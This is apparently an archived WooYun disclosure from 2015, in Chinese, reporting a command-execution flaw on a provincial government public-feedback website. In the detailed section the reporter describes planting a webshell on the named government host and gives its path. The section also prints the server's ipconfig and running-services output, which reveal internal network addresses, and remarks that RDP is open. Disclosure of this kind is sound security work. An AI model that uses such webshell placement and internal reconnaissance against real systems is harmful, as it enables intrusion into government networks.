某省省委民声通道网站沦陷(已入内网) | wooyun-2015-0116629| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0116629

漏洞标题：某省省委民声通道网站沦陷(已入内网)

漏洞作者：朱元璋

提交时间：2015-06-03 09:31

修复时间：2015-07-23 08:12

公开时间：2015-07-23 08:12

漏洞类型：命令执行

危害等级：高

自评Rank：19

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-06-03：细节已通知厂商并且等待厂商处理中
2015-06-08：厂商已经确认，细节仅向厂商公开
2015-06-18：细节向核心白帽子及相关领域专家公开
2015-06-28：细节向普通白帽子公开
2015-07-08：细节向实习白帽子公开
2015-07-23：细节向公众公开

简要描述：

详细说明：

地址http://www.mstd.gov.cn/MSTD/province/index.action存在命令执行漏洞

传马看内网情况

马地址http://www.mstd.gov.cn/MSTD/02.jsp
ipconfig/all

Windows IP 配置
   主机名  . . . . . . . . . . . . . : WIN-VH7J1D3G8S4
   主 DNS 后缀 . . . . . . . . . . . : 
   节点类型  . . . . . . . . . . . . : 混合
   IP 路由已启用 . . . . . . . . . . : 否
   WINS 代理已启用 . . . . . . . . . : 否
以太网适配器 本地连接 4:
   连接特定的 DNS 后缀 . . . . . . . : 
   描述. . . . . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection
   物理地址. . . . . . . . . . . . . : 00-50-56-A1-7A-9A
   DHCP 已启用 . . . . . . . . . . . : 否
   自动配置已启用. . . . . . . . . . : 是
   本地链接 IPv6 地址. . . . . . . . : fe80::e925:c349:5560:7dee%21(首选) 
   IPv4 地址 . . . . . . . . . . . . : 192.168.1.195(首选) 
   子网掩码  . . . . . . . . . . . . : 255.255.255.0
   默认网关. . . . . . . . . . . . . : 192.168.1.254
   DHCPv6 IAID . . . . . . . . . . . : 352342102
   DHCPv6 客户端 DUID  . . . . . . . : 00-01-00-01-19-AC-25-6B-00-50-56-97-20-9F
   DNS 服务器  . . . . . . . . . . . : 202.101.224.68
   TCPIP 上的 NetBIOS  . . . . . . . : 已启用
以太网适配器 本地连接 3:
   连接特定的 DNS 后缀 . . . . . . . : 
   描述. . . . . . . . . . . . . . . : vmxnet3 Ethernet Adapter #3
   物理地址. . . . . . . . . . . . . : 00-50-56-A1-6C-5E
   DHCP 已启用 . . . . . . . . . . . : 否
   自动配置已启用. . . . . . . . . . : 是
   本地链接 IPv6 地址. . . . . . . . : fe80::c562:71d5:a355:5485%17(首选) 
   IPv4 地址 . . . . . . . . . . . . : 10.2.6.233(首选) 
   子网掩码  . . . . . . . . . . . . : 255.255.255.0
   默认网关. . . . . . . . . . . . . : 
   DHCPv6 IAID . . . . . . . . . . . : 285233238
   DHCPv6 客户端 DUID  . . . . . . . : 00-01-00-01-19-AC-25-6B-00-50-56-97-20-9F
   DNS 服务器  . . . . . . . . . . . : 202.101.224.68
   TCPIP 上的 NetBIOS  . . . . . . . : 已启用
隧道适配器 isatap.{DCA508D3-83A1-4B24-A8BB-AC0BB0CEBE4A}:
   媒体状态  . . . . . . . . . . . . : 媒体已断开
   连接特定的 DNS 后缀 . . . . . . . : 
   描述. . . . . . . . . . . . . . . : Microsoft ISATAP Adapter
   物理地址. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0
   DHCP 已启用 . . . . . . . . . . . : 否
   自动配置已启用. . . . . . . . . . : 是
隧道适配器 Teredo Tunneling Pseudo-Interface:
   连接特定的 DNS 后缀 . . . . . . . : 
   描述. . . . . . . . . . . . . . . : Microsoft Teredo Tunneling Adapter
   物理地址. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0
   DHCP 已启用 . . . . . . . . . . . : 否
   自动配置已启用. . . . . . . . . . : 是
   IPv6 地址 . . . . . . . . . . . . : 2001:0:3d83:d0d2:24e2:11dd:3f57:fe3c(首选) 
   本地链接 IPv6 地址. . . . . . . . : fe80::24e2:11dd:3f57:fe3c%20(首选) 
   默认网关. . . . . . . . . . . . . : ::
   TCPIP 上的 NetBIOS  . . . . . . . : 已禁用
隧道适配器 isatap.{07D6B996-8CFD-424D-B54A-D5F75109CC09}:
   媒体状态  . . . . . . . . . . . . : 媒体已断开
   连接特定的 DNS 后缀 . . . . . . . : 
   描述. . . . . . . . . . . . . . . : Microsoft ISATAP Adapter #2
   物理地址. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0
   DHCP 已启用 . . . . . . . . . . . : 否
   自动配置已启用. . . . . . . . . . : 是

net start

已经启动以下 Windows 服务: 
   Application Experience
   Application Information
   Application Management
   Base Filtering Engine
   Certificate Propagation
   COM+ Event System
   COM+ System Application
   Cryptographic Services
   DCOM Server Process Launcher
   Desktop Window Manager Session Manager
   DHCP Client
   Diagnostic Policy Service
   Distributed Link Tracking Client
   Distributed Transaction Coordinator
   DNS Client
   Group Policy Client
   IKE and AuthIP IPsec Keying Modules
   IP Helper
   IPsec Policy Agent
   Network Connections
   Network List Service
   Network Location Awareness
   Network Store Interface Service
   Plug and Play
   Power
   Print Spooler
   Protected Storage
   Remote Desktop Configuration
   Remote Desktop Services
   Remote Desktop Services UserMode Port Redirector
   Remote Procedure Call (RPC)
   Remote Registry
   RPC Endpoint Mapper
   Security Accounts Manager
   Server
   Shell Hardware Detection
   Software Protection
   SPP Notification Service
   System Event Notification Service
   Task Scheduler
   TCP/IP NetBIOS Helper
   User Profile Service
   VMware Tools Service
   Windows Event Log
   Windows Firewall
   Windows Font Cache Service
   Windows Management Instrumentation
   Windows Remote Management (WS-Management)
   Windows Update
   Workstation
命令成功完成。

漏洞证明：

好多沦陷的网站都有个特点，开启了3389，呵呵

修复方案：

加强安全意识

版权声明：转载请注明来源朱元璋@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：10

确认时间：2015-06-08 08:11

厂商回复：

CNVD确认并复现所述情况,已经转由CNCERT下发给江西分中心,由其后续协调网站管理单位处置.按通用软件漏洞评分,rank 10

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0116629

漏洞标题：某省省委民声通道网站沦陷(已入内网)

相关厂商：cncert国家互联网应急中心

漏洞作者：朱元璋

提交时间：2015-06-03 09:31

修复时间：2015-07-23 08:12

公开时间：2015-07-23 08:12

漏洞类型：命令执行

危害等级：高

自评Rank：19

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源朱元璋@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0116629

漏洞标题：某省省委民声通道网站沦陷(已入内网)

相关厂商：cncert国家互联网应急中心

漏洞作者： 朱元璋

提交时间：2015-06-03 09:31

修复时间：2015-07-23 08:12

公开时间：2015-07-23 08:12

漏洞类型：命令执行

危害等级：高

自评Rank：19

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0116629"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 朱元璋@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

漏洞作者：朱元璋

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源朱元璋@乌云